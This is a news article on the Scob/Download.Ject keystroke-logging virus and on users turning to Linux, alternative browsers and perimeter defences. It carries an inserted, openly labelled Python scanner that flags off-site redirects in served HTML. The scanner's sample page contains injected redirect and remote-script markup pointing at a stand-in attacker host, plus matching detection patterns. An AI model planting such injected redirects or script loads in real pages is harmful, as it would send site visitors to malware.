Plenty of people are still seething about Scob, a new virus that uses keystroke logging to steal credit card numbers and other personal information. Beyond its special quirks, though, Scob is being seen as just the latest of many malware epidemics to blast through the holes in Microsoft’s software.
Armed with non-Microsoft browsers, alternative operating systems and perimeter-defense tools, channel members and customers keep dodging and blocking an ongoing barrage of viral bullets.
Also known as Download.Ject, Scob can infect Windows 2000 servers running IIS (Internet Information Server) 5.0 that haven’t been fixed with the MS04-011 patch. When users running IE (Internet Explorer) visit an affected Web site, they’re redirected to a Russian Web site that secretly installs a Trojan containing keystroke logging.
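The infection chain the article describes ends with visitors of a compromised site being sent to a third-party host. A site operator who wants to check whether the pages their own server is serving contain such off-site redirects or remote scripts can do so with a simple scan of the HTML. The example below is added here for illustration; it is not code from the article, from eWEEK, or from any of the people quoted, and it does not reproduce the specific way Scob modified IIS responses. It assumes the operator knows their own hostname, and the two HTML samples and the hostnames in them (example-shop.test, attacker-host.invalid) are constructed placeholders.

```python
"""Flag off-site redirects and remote scripts in HTML that a web server is serving.

Added example for defenders checking their own pages; not part of the original
article. Sample HTML and hostnames below are constructed placeholders.
"""
import re
from urllib.parse import urlparse

# Constructed sample: a page as the operator expects it to look.
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="/js/app.js"></script></head>
<body><a href="https://www.example-shop.test/cart">Cart</a></body></html>"""

# Constructed sample: the same page carrying three kinds of off-site reference
# that together mimic the "visit our site, get sent elsewhere" behaviour.
INJECTED_PAGE = """<html><head><title>Shop</title>
<meta http-equiv="refresh" content="0;url=http://attacker-host.invalid/x.html">
<script>window.location="http://attacker-host.invalid/drop.html";</script>
<script src="http://attacker-host.invalid/payload.js"></script></head>
<body>Welcome</body></html>"""

# <meta http-equiv="refresh" content="N;url=..."> redirects.
META_REFRESH_RE = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\'][^"\']*?url=([^"\'>\s]+)',
    re.IGNORECASE,
)
# JavaScript assignments such as window.location = "http://..." or location.href = "http://...".
JS_LOCATION_RE = re.compile(
    r'(?:window|document|top|self)?\.?location(?:\.href)?\s*=\s*["\'](https?://[^"\']+)["\']',
    re.IGNORECASE,
)
# <script src="http://..."> loading code from another host.
SCRIPT_SRC_RE = re.compile(
    r'<script[^>]*\ssrc\s*=\s*["\'](https?://[^"\']+)["\']',
    re.IGNORECASE,
)


def is_offsite(url, own_host):
    """True when the URL points at a host other than own_host or one of its subdomains."""
    host = urlparse(url).hostname
    if host is None:
        return False  # relative URL: served from this site
    host = host.lower()
    own = own_host.lower()
    return not (host == own or host.endswith("." + own))


def find_offsite_references(html, own_host):
    """Return a list of (kind, url) pairs for every off-site redirect or remote script found."""
    findings = []
    for label, pattern in (
        ("meta-refresh", META_REFRESH_RE),
        ("js-location", JS_LOCATION_RE),
        ("remote-script", SCRIPT_SRC_RE),
    ):
        for match in pattern.finditer(html):
            url = match.group(1)
            if is_offsite(url, own_host):
                findings.append((label, url))
    return findings


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        hits = find_offsite_references(page, "www.example-shop.test")
        print(f"{name}: {len(hits)} off-site reference(s)")
        for kind, url in hits:
            print(f"  {kind}: {url}")
```

The scan deliberately treats the site's own subdomains as on-site and relative URLs as harmless, so legitimate CDN hosts under the operator's domain do not trip it; any hit on an unknown host is a reason to compare the served page against the copy on disk, since the injection may live in server configuration rather than in the page file itself.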
“Scob is a major concern to my customers. Viruses are getting way out of control,” attested Tasawar Jalali, president of SecureNode Inc., a security consulting firm serving midsized, high-tech firms in the Silicon Valley, along with some Fortune 500 corporations. Jalali estimated a 100 percent rise in viral outbreaks among his customers over the past six to nine months alone.
“It’s shocking that Microsoft had vulnerabilities in there which let users pick up this virus just by going to ordinary Web sites,” said Eric Smith, programmer/analyst for the Lawrence Berkeley National Labs’ Berkeley Drosophila Genome Project (BDGP).
“But I’m really glad that we don’t have to deal with Scob here,” added Smith, a staunch advocate of Linux and other non-Microsoft software.
Actually, any number of earlier viruses held the potential for keystroke logging, too, according to Jalali. “It just hasn’t really happened until now.”
In a series of interviews, channel members and users agreed that patches and third-party anti-viral software both can be helpful in stemming malware. But several said Microsoft’s patches can sometimes create new problems, too.
One response is to run a non-Microsoft browser on top of Windows. Robert Lazo, principal at The Beguine Group, a project management and software engineering consultancy in New York, said he uses Netscape’s Mozilla browser on his own desktop, in addition to “non-Outlook e-mail software.” Opera is another non-Microsoft browser that works on Windows.
Yet many others who are tired of patches have already broken away from Windows to non-Microsoft OSes, either on servers only, or on servers and desktops alike.
“I’ve seen a huge trend toward the use of Apache Web servers among our customers,” Jalali said. On the other hand, transitioning from Windows to Linux can pose some tough issues, he said. “Customers need systems administrators who are trained in Linux.”
Some companies, though, haven’t found the Linux knowledge barrier all that hard to break. Paul Bocheck, Ph.D., who heads up 24/7 Zone LLC, also operates his company’s Web site on Apache. For the desktop, Bocheck has settled on Red Hat Linux. Specializing in networked video, 24/7 Zone is a consultancy and software development firm based in Manhattan.
For his part, Smith became a SuSE Linux fan back in about 1995, when he was working in IT for an ad agency. A boss at the agency wanted to move to the NeXT OS. “But we didn’t have the bucks for NeXT, so we went to Linux.”
When Smith first arrived at the BDGP two-and-a-half years ago, security constituted about 10 percent of his job. “Today, it’s around 40 percent,” he said.
The BDGP uses a genome database that still runs on Windows NT, but Smith has set up a Linux firewall to the outside world. Meanwhile, he’s moved other servers to Linux.
About 20 BDGP staff members are running Linux on the desktop, while the other 20 use Apple Macintoshes.
Smith cautions against the use of Microsoft’s IIS, in any case. “Don’t even touch it! Why bother? Windows wasn’t exactly built with security in mind. If you don’t use Windows, you don’t have to put up with ActiveX,” he recommended.
“And if you really need to have Microsoft Office or MS Project, I’d suggest running it on the Mac.”
But SecureNode’s Jalali claims that many end-users resist even non-Microsoft browsers, let alone non-Microsoft OSes.
“Lots of people in sales and marketing, for instance, really rely on MS Word, Excel and so forth. It’s true that Linux has come a long way with its desktop GUI. But there are still many misperceptions out there that Linux is much harder to use, or even that it’s text-based only,” he said.
Jalali did try to move one of SecureNode’s customers from IE to Mozilla running on Windows.
“But acceptance was quite low. The end-users wanted to stick with a browser they already knew how to use. More than 60 percent of the users switched back to IE,” he recalled.
Jalali said he sees much more promise in perimeter-defense offerings such as Fortinet Inc.’s FortiGate antiviral firewall and Qualys Inc.’s Security On Demand service. Some of his customers have already stepped to products and services of this sort. “There’s plenty of room in this space for new vendors, as well,” he said.
Meanwhile, over at Berkeley, Smith is blocking viruses at the perimeter, too, leveraging a Linux-based intrusion-detection system.
Is Microsoft to blame for Scob and the slew of other malware that’s plagued Windows in recent years? Opinions vary on this question, too.
“It isn’t really Microsoft’s fault. Windows software is so widely used that people will always write viruses for it, no matter what Microsoft does. That’s why I think you have to block viruses at the perimeter,” Jalali said.
Smith conceded that Linux isn’t entirely impervious to viruses, either. “But unlike Linux, Windows is a closed operating system. This makes it much harder to tell whether you’ve been compromised, and to take action against it,” he said.
Check out eWEEK.com’s Security Center at http://security.eweek.com for security news, views and analysis. Be sure to add our eWEEK.com security news feed to your RSS newsreader or My Yahoo page: